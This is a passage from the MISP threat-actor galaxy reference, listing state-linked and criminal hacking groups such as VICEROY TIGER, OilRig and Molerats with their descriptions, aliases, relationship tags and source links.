https://www.microsoft.com/en-us/security/blog/2022/12/06/dev-0139-launches-targeted-attacks-against-the-cryptocurrency-industry/

https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds

https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists

VICEROY TIGER

VICEROY TIGER is an adversary with a nexus to India that has historically targeted entities throughout multiple sectors. Older activity targeted multiple sectors and countries; however, since 2015 this adversary appears to focus on entities in Pakistan with a particular focus on government and security organizations. This adversary consistently leverages spear phishing emails containing malicious Microsoft Office documents, malware designed to target the Android mobile platform, and phishing activity designed to harvest user credentials. In March 2017, the 360 Chasing Team found a sample of targeted attacks that confirmed the previously unknown sample of APT’s attack actions, which the organization can now trace back at least in April 2016. The chasing team named the attack organization APT-C-35. In June 2017, the 360 Threat Intelligence Center discovered the organization’s new attack activity, confirmed and exposed the gang’s targeted attacks against Pakistan, and analyzed in detail. The unique EHDevel malicious code framework used by the organization.

The tag is: misp-galaxy:threat-actor="VICEROY TIGER"

VICEROY TIGER is also known as:

  • OPERATION HANGOVER

  • Donot Team

  • APT-C-35

  • SectorE02

  • Orange Kala

VICEROY TIGER has relationships with:

  • similar: misp-galaxy:360net-threat-actor="摩诃草 - APT-C-09" with estimative-language:likelihood-probability="likely"

Table 11827. Table References

Links

https://github.com/jack8daniels2/threat-INTel/blob/master/2013/Unveiling-an-Indian-Cyberattack-Infrastructure-appendixes.pdf

https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/

https://www.netscout.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia

https://ti.360.net/blog/articles/donot-group-is-targeting-pakistani-businessman-working-in-china-en/

https://www.crowdstrike.com/blog/viceroy-tiger-delivers-new-zero-day-exploit/index.html

https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/

https://unit42.paloaltonetworks.com/threat-assessment-hangover-threat-group/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://blog.cyble.com/2021/07/22/donot-apt-group-delivers-a-spyware-variant-of-chat-app/

https://adversary.crowdstrike.com/en-US/adversary/viceroy-tiger

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

PIZZO SPIDER

The tag is: misp-galaxy:threat-actor="PIZZO SPIDER"

PIZZO SPIDER is also known as:

  • DD4BC

  • Ambiorx

Table 11828. Table References

Links

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

Corsair Jackal

The tag is: misp-galaxy:threat-actor="Corsair Jackal"

Corsair Jackal is also known as:

  • TunisianCyberArmy

Table 11829. Table References

Links

https://web.archive.org/web/20160315044507/https://www.crowdstrike.com/blog/regional-conflict-and-cyber-blowback/

SNOWGLOBE

In 2014, researchers at Kaspersky Lab discovered and reported on three zero-days that were being used in cyberattacks in the wild. Two of these zero-day vulnerabilities are associated with an advanced threat actor we call Animal Farm. Over the past few years, Animal Farm has targeted a wide range of global organizations. The group has been active since at least 2009 and there are signs that earlier malware versions were developed as far back as 2007.

The tag is: misp-galaxy:threat-actor="SNOWGLOBE"

SNOWGLOBE is also known as:

  • Animal Farm

  • Snowglobe

  • ATK8

Table 11830. Table References

Links

https://securelist.com/blog/research/69114/animals-in-the-apt-farm/

https://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france

https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/

https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/

https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope

https://www.cfr.org/interactive/cyber-operations/snowglobe

https://resources.infosecinstitute.com/animal-farm-apt-and-the-shadow-of-france-intelligence/

Deadeye Jackal

The Syrian Electronic Army (SEA) is a group of computer hackers which first surfaced online in 2011 to support the government of Syrian President Bashar al-Assad. Using spamming, website defacement, malware, phishing, and denial of service attacks, it has targeted political opposition groups, western news organizations, human rights groups and websites that are seemingly neutral to the Syrian conflict. It has also hacked government websites in the Middle East and Europe, as well as US defense contractors. As of 2011 the SEA has been the first Arab country to have a public Internet Army hosted on its national networks to openly launch cyber attacks on its enemies. The precise nature of SEA’s relationship with the Syrian government has changed over time and is unclear

The tag is: misp-galaxy:threat-actor="Deadeye Jackal"

Deadeye Jackal is also known as:

  • SyrianElectronicArmy

  • SEA

Table 11831. Table References

Links

https://en.wikipedia.org/wiki/Syrian_Electronic_Army

Operation C-Major

Group targeting Indian Army or related assets in India, as well as activists and civil society in Pakistan. Attribution to a Pakistani connection has been made by TrendMicro and others.

The tag is: misp-galaxy:threat-actor="Operation C-Major"

Operation C-Major is also known as:

  • C-Major

  • Transparent Tribe

  • Mythic Leopard

  • ProjectM

  • APT36

  • APT 36

  • TMP.Lapis

  • Green Havildar

  • COPPER FIELDSTONE

  • Earth Karkaddan

Operation C-Major has relationships with:

  • similar: misp-galaxy:360net-threat-actor="透明部落 - APT-C-56" with estimative-language:likelihood-probability="likely"

Table 11832. Table References

Links

http://documents.trendmicro.com/assets/pdf/Indian-military-personnel-targeted-by-information-theft-campaign-cmajor.pdf

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

https://www.amnesty.org/en/documents/asa33/8366/2018/en/

https://www.crowdstrike.com/blog/adversary-of-the-month-for-may/

https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe

https://mkd-cirt.mk/wp-content/uploads/2018/08/20181009_3_1_M-Trends2018-May-2018-compressed.pdf

https://nciipc.gov.in/documents/NCIIPC_Newsletter_July18.pdf

https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials

https://s.tencent.com/research/report/669.html

https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html

https://www.secureworks.com/research/threat-profiles/copper-fieldstone

https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html

https://www.sentinelone.com/labs/capratube-transparent-tribes-caprarat-mimics-youtube-to-hijack-android-phones/

Stealth Falcon

This threat actor targets civil society groups and Emirati journalists, activists, and dissidents.

The tag is: misp-galaxy:threat-actor="Stealth Falcon"

Stealth Falcon is also known as:

  • FruityArmor

  • G0038

Stealth Falcon has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Stealth Falcon - G0038" with estimative-language:likelihood-probability="likely"

Table 11833. Table References

Links

https://citizenlab.ca/2016/05/stealth-falcon/

https://www.cfr.org/interactive/cyber-operations/stealth-falcon

https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/

https://attack.mitre.org/groups/G0038/

HummingBad

This group created a malware that takes over Android devices and generates $300,000 per month in fraudulent ad revenue. The group effectively controls an arsenal of over 85 million mobile devices around the world. With the potential to sell access to these devices to the highest bidder

The tag is: misp-galaxy:threat-actor="HummingBad"

Table 11834. Table References

Links

http://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report_FINAL-62916.pdf

QUILTED TIGER

Dropping Elephant (also known as “Chinastrats” and “Patchwork“) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools. Its victims are all involved with China’s foreign relations in some way, and are generally caught through spear-phishing or watering hole attacks.

The tag is: misp-galaxy:threat-actor="QUILTED TIGER"

QUILTED TIGER is also known as:

  • Chinastrats

  • Patchwork

  • Monsoon

  • Sarit

  • Dropping Elephant

  • APT-C-09

  • ZINC EMERSON

  • ATK11

  • G0040

  • Orange Athos

  • Thirsty Gemini

QUILTED TIGER has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Patchwork - G0040" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="MONSOON - G0042" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="摩诃草 - APT-C-09" with estimative-language:likelihood-probability="likely"

Table 11835. Table References

Links

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=09308982-77bd-41e0-8269-f2cc9ce3266e&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign

https://www.cymmetria.com/patchwork-targeted-attack/

https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf

https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/

https://attack.mitre.org/groups/G0040/

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

https://securelist.com/the-dropping-elephant-actor/75328/

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

https://www.secureworks.com/research/threat-profiles/zinc-emerson

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait

https://unit42.paloaltonetworks.com/atoms/thirstygemini/

Scarlet Mimic

Scarlet Mimic is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group’s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by Scarlet Mimic and Putter Panda, APT 2, it has not been concluded that the groups are the same. The attacks began over four years ago and their targeting pattern suggests that this adversary’s primary mission is to gather information about minority rights activists. We do not have evidence directly linking these attacks to a government source, but the information derived from these activities supports an assessment that a group or groups with motivations similar to the stated position of the Chinese government in relation to these targets is involved. The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes. Both the Tibetan community and the Uyghurs, a Turkic Muslim minority residing primarily in northwest China, have been targets of multiple sophisticated attacks in the past decade. Both also have history of strained relationships with the government of the People’s Republic of China (PRC), though we do not have evidence that links Scarlet Mimic attacks to the PRC. Scarlet Mimic attacks have also been identified against government organizations in Russia and India, who are responsible for tracking activist and terrorist activities. While we do not know the precise target of each of the Scarlet Mimic attacks, many of them align to the patterns described above.

The tag is: misp-galaxy:threat-actor="Scarlet Mimic"

Scarlet Mimic is also known as:

  • G0029

  • Golfing Taurus

Scarlet Mimic has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Scarlet Mimic - G0029" with estimative-language:likelihood-probability="likely"

Table 11836. Table References

Links

https://attack.mitre.org/wiki/Groups

https://unit42.paloaltonetworks.com/scarlet-mimic-years-long-espionage-targets-minority-activists/

https://attack.mitre.org/groups/G0029/

https://unit42.paloaltonetworks.com/atoms/golfing-taurus/

Poseidon Group

Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm.

The tag is: misp-galaxy:threat-actor="Poseidon Group"

Poseidon Group is also known as:

  • G0033

Poseidon Group has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Poseidon Group - G0033" with estimative-language:likelihood-probability="likely"

Table 11837. Table References

Links

https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/

https://attack.mitre.org/wiki/Groups

https://attack.mitre.org/groups/G0033/

DragonOK

Threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, DragonOK is thought to have a direct or indirect relationship with the threat group Moafee. 2223 It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT.

The tag is: misp-galaxy:threat-actor="DragonOK"

DragonOK is also known as:

  • Moafee

  • BRONZE OVERBROOK

  • G0017

  • G0002

  • Shallow Taurus

DragonOK has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Moafee - G0002" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="DragonOK - G0017" with estimative-language:likelihood-probability="likely"

Table 11838. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf

https://attack.mitre.org/wiki/Groups

https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor

https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf

https://www.cfr.org/interactive/cyber-operations/moafee

https://unit42.paloaltonetworks.com/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/

https://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/

https://www.phnompenhpost.com/national/kingdom-targeted-new-malware

https://attack.mitre.org/groups/G0017/

https://attack.mitre.org/groups/G0002/

https://www.secureworks.com/research/threat-profiles/bronze-overbrook

https://unit42.paloaltonetworks.com/atoms/shallowtaurus/

ProjectSauron

ProjectSauron is the name for a top level modular cyber-espionage platform, designed to enable and manage long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods. Technical details show how attackers learned from other extremely advanced actors in order to avoid repeating their mistakes. As such, all artifacts are customized per given target, reducing their value as indicators of compromise for any other victim. Usually APT campaigns have a geographical nexus, aimed at extracting information within a specific region or from a given industry. That usually results in several infections in countries within that region, or in the targeted industry around the world. Interestingly, ProjectSauron seems to be dedicated to just a couple of countries, focused on collecting high value intelligence by compromising almost all key entities it could possibly reach within the target area. The name, ProjectSauron reflects the fact that the code authors refer to ‘Sauron’ in the Lua scripts.

The tag is: misp-galaxy:threat-actor="ProjectSauron"

ProjectSauron is also known as:

  • Strider

  • Sauron

  • Project Sauron

  • G0041

ProjectSauron has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Strider - G0041" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="索伦之眼 - APT-C-16" with estimative-language:likelihood-probability="likely"

Table 11839. Table References

Links

https://securelist.com/analysis/publications/75533/faq-the-projectsauron-apt/

https://www.cfr.org/interactive/cyber-operations/project-sauron

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf

https://attack.mitre.org/groups/G0041/

TA530

TA530, who we previously examined in relation to large-scale personalized phishing campaigns

The tag is: misp-galaxy:threat-actor="TA530"

Table 11840. Table References

Links

https://www.proofpoint.com/uk/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene

GCMAN

GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services.

The tag is: misp-galaxy:threat-actor="GCMAN"

GCMAN is also known as:

  • G0036

GCMAN has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="GCMAN - G0036" with estimative-language:likelihood-probability="likely"

Table 11841. Table References

Links

https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/

https://attack.mitre.org/groups/G0036/

FIN6

FIN is a group targeting financial assets including assets able to do financial transaction including PoS.

The tag is: misp-galaxy:threat-actor="FIN6"

FIN6 is also known as:

  • SKELETON SPIDER

  • ITG08

  • MageCart Group 6

  • White Giant

  • GOLD FRANKLIN

  • ATK88

  • G0037

  • Camouflage Tempest

FIN6 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="FIN6 - G0037" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="FrameworkPOS - S0503" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:microsoft-activity-group="Camouflage Tempest" with estimative-language:likelihood-probability="likely"

Table 11843. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

https://attack.mitre.org/groups/G0037/

https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/

http://www.secureworks.com/research/threat-profiles/gold-franklin

https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/

Libyan Scorpions

Libyan Scorpions is a malware operation in use since September 2015 and operated by a politically motivated group whose main objective is intelligence gathering, spying on influentials and political figures and operate an espionage campaign within Libya.

The tag is: misp-galaxy:threat-actor="Libyan Scorpions"

TeamXRat

The tag is: misp-galaxy:threat-actor="TeamXRat"

TeamXRat is also known as:

  • CorporacaoXRat

  • CorporationXRat

Table 11844. Table References

Links

https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/

OilRig

OilRig is an Iranian threat group operating primarily in the Middle East by targeting organizations in this region that are in a variety of different industries; however, this group has occasionally targeted organizations outside of the Middle East as well. It also appears OilRig carries out supply chain attacks, where the threat group leverages the trust relationship between organizations to attack their primary targets.

OilRig is an active and organized threat group, which is evident based on their systematic targeting of specific organizations that appear to be carefully chosen for strategic purposes. Attacks attributed to this group primarily rely on social engineering to exploit the human rather than software vulnerabilities; however, on occasion this group has used recently patched vulnerabilities in the delivery phase of their attacks. The lack of software vulnerability exploitation does not necessarily suggest a lack of sophistication, as OilRig has shown maturity in other aspects of their operations. Such maturities involve:

-Organized evasion testing used the during development of their tools. -Use of custom DNS Tunneling protocols for command and control (C2) and data exfiltration. -Custom web-shells and backdoors used to persistently access servers.

OilRig relies on stolen account credentials for lateral movement. After OilRig gains access to a system, they use credential dumping tools, such as Mimikatz, to steal credentials to accounts logged into the compromised system. The group uses these credentials to access and to move laterally to other systems on the network. After obtaining credentials from a system, operators in this group prefer to use tools other than their backdoors to access the compromised systems, such as remote desktop and putty. OilRig also uses phishing sites to harvest credentials to individuals at targeted organizations to gain access to internet accessible resources, such as Outlook Web Access.

Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government.

The tag is: misp-galaxy:threat-actor="OilRig"

OilRig is also known as:

  • Twisted Kitten

  • Cobalt Gypsy

  • Crambus

  • Helix Kitten

  • APT 34

  • APT34

  • IRN2

  • ATK40

  • G0049

  • Evasive Serpens

  • Hazel Sandstorm

  • EUROPIUM

  • TA452

OilRig has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Clever Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="OilRig - G0049" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="APT34 - G0057" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Hazel Sandstorm" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-ics-groups="OilRig" with estimative-language:likelihood-probability="almost-certain"

Table 11845. Table References

Links

https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability

https://unit42.paloaltonetworks.com/unit42-striking-oil-closer-look-adversary-infrastructure/

https://unit42.paloaltonetworks.com/unit42-introducing-the-adversary-playbook-first-up-oilrig/

https://unit42.paloaltonetworks.com/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/

https://unit42.paloaltonetworks.com/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/

https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/

https://unit42.paloaltonetworks.com/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/

https://unit42.paloaltonetworks.com/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery/

https://unit42.paloaltonetworks.com/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/

https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/

https://unit42.paloaltonetworks.com/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/

https://unit42.paloaltonetworks.com/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/

https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

https://pan-unit42.github.io/playbook_viewer/

https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html

https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

https://www.gov.il/BlobFolder/reports/attack_il/he/CERT-IL-ALERT-W-120.pdf

https://www.forbes.com/sites/thomasbrewster/2017/02/15/oilrig-iran-hackers-cyberespionage-us-turkey-saudi-arabia/#56749aa2468a

https://raw.githubusercontent.com/pan-unit42/playbook_viewer/master/playbook_json/oilrig.json

https://www.cfr.org/interactive/cyber-operations/oilrig

https://www.cfr.org/interactive/cyber-operations/apt-34

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail

https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks

https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

https://www.clearskysec.com/oilrig/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/

https://attack.mitre.org/groups/G0049/

https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/

https://www.secureworks.com/research/threat-profiles/cobalt-gypsy

https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf

https://www.wired.com/story/apt-34-iranian-hackers-critical-infrastructure-companies/

https://unit42.paloaltonetworks.com/atoms/evasive-serpens/

https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/

Volatile Cedar

Beginning in late 2012, a carefully orchestrated attack campaign we call Volatile Cedar has been targeting individuals, companies and institutions worldwide. This campaign, led by a persistent attacker group, has successfully penetrated a large number of targets using various attack techniques, and specifically, a custom-made malware implant codenamed Explosive.

The tag is: misp-galaxy:threat-actor="Volatile Cedar"

Volatile Cedar is also known as:

  • Lebanese Cedar

  • DeftTorero

Volatile Cedar has relationships with:

  • uses: misp-galaxy:tool="Explosive" with estimative-language:likelihood-probability="very-likely"

Table 11846. Table References

Links

https://blog.checkpoint.com/2015/03/31/volatilecedar/

https://blog.checkpoint.com/2015/06/09/new-data-volatile-cedar/

https://securelist.com/sinkholing-volatile-cedar-dga-infrastructure/69421/

https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf

https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/

Dancing Salome

Dancing Salome is the Kaspersky codename for an APT actor with a primary focus on ministries of foreign affairs, think tanks, and Ukraine. What makes Dancing Salome interesting and relevant is the attacker’s penchant for leveraging HackingTeam RCS implants compiled after the public breach.

The tag is: misp-galaxy:threat-actor="Dancing Salome"

Table 11847. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170728/Guerrero-Saade-Raiu-VB2017.pdf

TERBIUM

Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.

The tag is: misp-galaxy:threat-actor="TERBIUM"

TERBIUM has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="TERBIUM" with estimative-language:likelihood-probability="likely"

Table 11848. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/

Molerats

In October 2012, malware attacks against Israeli government targets grabbed media attention as officials temporarily cut off Internet access for its entire police force and banned the use of USB memory sticks. Security researchers subsequently linked these attacks to a broader, yearlong campaign that targeted not just Israelis but Palestinians as well. and as discovered later, even the U.S. and UK governments. Further research revealed a connection between these attacks and members of the so-called “Gaza Hackers Team.” We refer to this campaign as “Molerats.”

The tag is: misp-galaxy:threat-actor="Molerats"

Molerats is also known as:

  • Gaza Hackers Team

  • Gaza cybergang

  • Gaza Cybergang

  • Operation Molerats

  • Extreme Jackal

  • Moonlight

  • ALUMINUM SARATOGA

  • G0021

  • BLACKSTEM

Molerats has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Molerats - G0021" with estimative-language:likelihood-probability="likely"

Table 11849. Table References

Links

https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html

https://ti.360.net/blog/articles/suspected-molerats-new-attack-in-the-middle-east/

https://ti.360.net/blog/articles/suspected-molerats-new-attack-in-the-middle-east-en/

https://middle-east-online.com/en/cyber-war-gaza-hackers-deface-israel-fire-service-website

https://www.fireeye.com/blog/threat-research/2014/06/molerats-here-for-spring.html

https://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html

https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks

https://securelist.com/gaza-cybergang-wheres-your-ir-team/72283/

https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf

https://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf

https://securelist.com/gaza-cybergang-updated-2017-activity/82765/

https://www.kaspersky.com/blog/gaza-cybergang/26363/

https://attack.mitre.org/groups/G0021/

https://www.secureworks.com/research/threat-profiles/aluminum-saratoga

https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf

PROMETHIUM

PROMETHIUM is an activity group that has been active as early as 2012. The group primarily uses Truvasys, a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, where it has masqueraded as one of server common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, Truvasys malware evolved with additional features—this shows a close relationship between the activity groups behind the campaigns and the developers of the malware.

The tag is: misp-galaxy:threat-actor="PROMETHIUM"

PROMETHIUM is also known as:

  • StrongPity

  • G0056

PROMETHIUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="PROMETHIUM - G0056" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="PROMETHIUM" with estimative-language:likelihood-probability="likely"

Table 11850. Table References

Links

https://www.microsoft.com/security/blog/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

https://www.virusbulletin.com/conference/vb2016/abstracts/last-minute-paper-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users

https://attack.mitre.org/groups/G0056/

NEODYMIUM

NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird. This backdoor’s characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.

The tag is: misp-galaxy:threat-actor="NEODYMIUM"

NEODYMIUM is also known as:

  • G0055

NEODYMIUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="NEODYMIUM - G0055" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="NEODYMIUM" with estimative-language:likelihood-probability="likely"

Table 11851. Table References

Links

https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/

https://attack.mitre.org/groups/G0055/

Packrat

A threat group that has been active for at least seven years has used malware, phishing and disinformation tactics to target activists, journalists, politicians and public figures in various Latin American countries. The threat actor, dubbed Packrat based on its preference for remote access Trojans (RATs) and because it has used the same infrastructure for several years, has been analyzed by Citizen Lab researchers John Scott-Railton, Morgan Marquis-Boire, and Claudio Guarnieri, and Cyphort researcher Marion Marschalek, best known for her extensive analysis of state-sponsored threats.

The tag is: misp-galaxy:threat-actor="Packrat"

Table 11852. Table References

Links

https://citizenlab.ca/2015/12/packrat-report/

Cadelle

Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014, however, it’s likely that activity began well before this date. Command-and-control (C&C) registrant information points to activity possibly as early as 2011, while executable compilation times suggest early 2012. Their attacks continue to the present day. Symantec estimates that each team is made up of between 5 and 10 people.

The tag is: misp-galaxy:threat-actor="Cadelle"

Table 11853. Table References

Links

https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

PassCV

